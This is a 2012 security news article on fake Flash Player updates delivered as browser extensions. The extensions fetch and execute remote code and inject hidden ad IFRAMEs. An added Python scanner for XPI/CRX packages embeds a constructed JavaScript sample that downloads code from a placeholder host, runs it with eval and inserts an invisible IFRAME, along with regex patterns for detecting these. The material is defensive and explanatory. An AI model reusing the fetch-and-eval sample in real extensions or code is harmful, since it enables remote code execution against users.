Phony add-ons are not detected by AV engines because they’re text files

Jun 23, 2012 10:03 GMT  ·  By

Because of its popularity, Adobe Flash Player is still an application that’s preferred by cybercriminals for campaigns that involve fake updates.

A new scheme discovered by Zscaler experts begins with a shady website that displays a phony video window which urges users to install Adobe Flash Player in order to view a clip.

The update is actually a fake browser extension. Depending on the browser the victim is running, they are presented with a .XPI file (Firefox), a .CRX file (Google Chrome), or a .exe file (Internet Explorer).

Once installed, these extensions allow the attacker to gain access to the infected machine.

However, this is not the main concern. The problem is that most antivirus solutions are unable to detect malicious extensions because they're basically text files. While the executable is easily identified as a threat, the .XPI and the .CRX are not flagged as dangerous by any of the AV engines on VirusTotal.

Another thing worth mentioning is that the fake browser add-ons don't themselves contain the malicious code. Instead, when the browser is launched they fetch and execute the code that causes the actual damage.

“The current files being pulled are not very dangerous, but that could change in the future. An invisible IFRAME is inserted in each new page loaded. The IFRAME contains advertising from resultsz.com, and contains a username in the URL,” Zscaler’s Julien Sobrier explained.

He believes that the adware’s creator makes a profit by generating traffic towards a specific website.

“The author could change the remote file at any moment to do much more harm, like stealing cookies to obtain access to the user accounts on any site, stealing username/credentials being entered or previously saved, etc,” he concluded.
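The two behaviours Sobrier describes (a remote file pulled and executed at browser start, and an invisible IFRAME inserted into pages) can be screened for statically, since an .XPI is a plain zip and a .CRX is a zip behind a short header. The scanner below is an added example, not code from the article or from Zscaler; its regex heuristics, the sample extension and the placeholder hostnames are all constructed for illustration.

```python
# Added example (not from the article or Zscaler): heuristic scan of a browser
# extension package. XPI = plain zip; CRX = "Cr24" header (v2: key+sig lengths, v3: one header length).
import io, re, struct, zipfile
INDICATORS = {  # constructed heuristics, not a vendor signature set
    "remote_code_exec": re.compile(r"eval\s*\([^)]*responseText"),
    "hidden_iframe": re.compile(r"createElement\(['\"]iframe['\"]\)[\s\S]{0,300}(display\s*=\s*['\"]none|visibility\s*=\s*['\"]hidden)"),
}

def extension_zip_bytes(data: bytes) -> bytes:
    """Strip a CRX header if present and return the embedded zip bytes."""
    if not data.startswith(b"Cr24"):
        return data                                   # XPI / bare zip
    version = struct.unpack("<I", data[4:8])[0]
    if version == 2:
        key_len, sig_len = struct.unpack("<II", data[8:16])
        return data[16 + key_len + sig_len:]
    if version == 3:
        return data[12 + struct.unpack("<I", data[8:12])[0]:]
    raise ValueError(f"unsupported CRX version {version}")

def scan_extension(data: bytes) -> dict:
    """Return {script path: [indicator names]} for scripts that trigger a heuristic."""
    hits = {}
    with zipfile.ZipFile(io.BytesIO(extension_zip_bytes(data))) as zf:
        for name in zf.namelist():
            if name.endswith((".js", ".jsm", ".html")):
                text = zf.read(name).decode("utf-8", errors="replace")
                found = sorted(k for k, rx in INDICATORS.items() if rx.search(text))
                if found:
                    hits[name] = found
    return hits

# Constructed sample mirroring the article: remote file pulled and executed at
# browser start, then an invisible IFRAME inserted into the page. Hosts are placeholders.
SAMPLE_JS = """
var x = new XMLHttpRequest();
x.open('GET', 'http://remote.example.invalid/payload.js', false); x.send(null);
eval(x.responseText);
var f = document.createElement('iframe'); f.style.display = 'none';
f.src = 'http://ads.example.invalid/?user=PLACEHOLDER'; document.body.appendChild(f);
"""

def build_sample(crx: bool = False) -> bytes:
    """Pack the sample as an XPI (zip), or wrap the zip in a minimal CRX2 header."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("manifest.json", '{"name": "Flash Player Update"}')
        zf.writestr("background.js", SAMPLE_JS)
    zip_bytes = buf.getvalue()
    return b"Cr24" + struct.pack("<III", 2, 0, 0) + zip_bytes if crx else zip_bytes
```

Run `scan_extension(open(path, "rb").read())` on a downloaded package; a clean add-on yields an empty dict, while the constructed sample flags both indicators whether packed as XPI or CRX.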

So, the best thing you can do to protect yourself against such threats is to avoid downloading shady updates from untrusted websites.